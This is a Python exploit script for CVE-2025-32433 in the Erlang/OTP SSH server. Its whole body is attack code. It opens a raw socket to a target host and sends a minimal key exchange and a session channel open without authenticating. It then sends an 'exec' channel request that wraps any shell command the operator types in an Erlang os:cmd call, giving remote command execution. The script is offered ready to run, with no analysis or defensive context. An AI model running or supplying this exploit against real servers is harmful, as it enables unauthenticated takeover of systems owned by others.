import argparse
import socket
import struct
import time

def parse_arguments():
    """Parse command line arguments."""
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-32433 (Erlang OTP SSH server).")
    parser.add_argument("-d", "--debug", action="store_true", help="Print raw response in hex format")
    parser.add_argument("-t", "--target", default="127.0.0.1", help="Target host (default: 127.0.0.1)")
    parser.add_argument("-p", "--port", type=int, default=2222, help="Target port (default: 2222)")
    return parser.parse_args()

def string_payload(s):
    """Helper function to format SSH string (4-byte length + bytes)."""
    s_bytes = s.encode()
    return struct.pack(">I", len(s_bytes)) + s_bytes

def build_channel_open(channel_id=0):
    """Builds SSH_MSG_CHANNEL_OPEN for session."""
    return (
        b"\x5a"  # SSH_MSG_CHANNEL_OPEN
        + string_payload("session")
        + struct.pack(">I", channel_id)
        + struct.pack(">I", 0x68000)  # initial window size
        + struct.pack(">I", 0x10000)  # max packet size
    )

def build_channel_request(command="", channel_id=0):
    """Builds SSH_MSG_CHANNEL_REQUEST with 'exec' payload."""
    return (
        b"\x62"  # SSH_MSG_CHANNEL_REQUEST
        + struct.pack(">I", channel_id)
        + string_payload("exec")
        + b"\x01"  # want_reply = true
        + string_payload(command)
    )

def build_kexinit():
    """Builds a minimal but valid SSH_MSG_KEXINIT packet."""
    nl = lambda l: string_payload(",".join(l))
    return (
        b"\x14"
        + b"\x00" * 16
        + nl(["curve25519-sha256", "ecdh-sha2-nistp256", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group14-sha256"])
        + nl(["rsa-sha2-256", "rsa-sha2-512"])
        + nl(["aes128-ctr"]) * 2
        + nl(["hmac-sha1"]) * 2
        + nl(["none"]) * 2
        + nl([]) * 2
        + b"\x00"
        + struct.pack(">I", 0)
    )

def pad_packet(payload, block_size=8):
    """Pads a packet to match SSH framing."""
    pad_len = block_size - ((len(payload) + 5) % block_size)
    if pad_len < 4:
        pad_len += block_size
    return (
        struct.pack(">I", len(payload) + 1 + pad_len)
        + bytes([pad_len])
        + payload
        + bytes([0] * pad_len)
    )

def escape_shell_command_for_erlang(cmd):
    """Escape shell command for Erlang."""
    escaped = cmd.replace("\\", "\\\\").replace("\"", "\\\"")
    return f'os:cmd("bash -c \'{escaped}\'").'

def main(args):
    """Main function to handle SSH interaction."""
    try:
        with socket.create_connection((args.target, args.port), timeout=5) as s:
            print("[*] Connecting to SSH server...")
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            banner = s.recv(1024)
            print(f"[✓] Banner: {banner.strip().decode(errors='ignore')}")
            time.sleep(0.5)

            print("[*] Sending KEXINIT...")
            s.sendall(pad_packet(build_kexinit()))
            time.sleep(0.5)

            print("[*] Opening channel...")
            s.sendall(pad_packet(build_channel_open()))
            time.sleep(0.5)

            shell_cmd = input("[?] Shell command: ").strip()
            erl_cmd = escape_shell_command_for_erlang(shell_cmd)

            print("[*] Sending CHANNEL_REQUEST...")
            s.sendall(pad_packet(build_channel_request(erl_cmd)))

            print("[✓] Payload sent.")

            try:
                response = s.recv(1024)
                if args.debug:
                    print(f"[+] Raw response (hex): {response.hex()}")
            except socket.timeout:
                if not args.debug:
                    print("[*] No response received (timeout).")

    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    args = parse_arguments()
    main(args)
